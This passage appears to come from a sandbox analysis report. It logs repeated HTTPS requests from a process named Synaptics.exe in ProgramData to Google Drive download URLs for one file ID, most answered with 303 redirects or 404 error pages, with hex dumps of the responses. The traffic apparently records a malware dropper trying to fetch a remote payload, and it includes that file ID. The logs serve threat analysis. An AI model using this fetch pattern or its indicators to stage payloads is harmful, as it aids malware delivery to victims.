                                                                                                                                                        2024-12-30 10:48:31 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 5a 50 4c 35 75 53 49 64 48 2d 63 70 6b 51 62 68 57 55 78 5a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="9ZPL5uSIdH-cpkQbhWUxZw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:31 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        86192.168.2.750106142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:31 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:32 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC5zNxRd2FZz7q2nYkKsSu9LoSiiOMsDs0Qn_5xLE6tLAXIcEgi9gQvjY0vhm9gEDcHt
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:32 GMT
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-2WIm3q_OXsY1STAuL6t_gA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:32 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:32 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 70 4d 6b 57 54 62 57 4c 33 63 4f 6b 52 78 65 59 35 36 74 43 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="npMkWTbWL3cOkRxeY56tCw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:32 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        87192.168.2.750107142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:31 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:32 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:31 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ZFRLERiJNUk3_tW0lMCtjQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        88192.168.2.750109142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:31 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:32 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6ZJtHK0kXHSAbONHcd2Aj41th3nrdAk60F-GSqsveAVAxMfvRqVLbTQ0xWjMDiEUBf1UymHYk
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:32 GMT
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-AxGsGedNodCh4Yi30VNLCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:32 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:32 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 68 58 4e 6d 69 43 32 6b 2d 59 31 55 52 4f 65 65 6e 71 6b 47 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="HhXNmiC2k-Y1UROeenqkGw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:32 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        89192.168.2.750108142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:31 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:32 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:31 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-_GX7so5w_PGSCJ2DgDi_rg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        90192.168.2.750112142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:32 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:32 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-gSlIIJqC4YpQdEllZ-O8SQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        91192.168.2.750111142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:32 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:32 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-DgztvnSftBmGnf7Z-3FOYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        92192.168.2.750114142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:32 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:33 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4R2GpV991AhRbKqc6ICKlzZU2qexi5lCWOHYFd0eXG9PX3SEhTbwgkhRK8LpWGE5tXt89FTf4
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:33 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-7JtuJjg9kPR51QbTWyN2Ig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:33 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
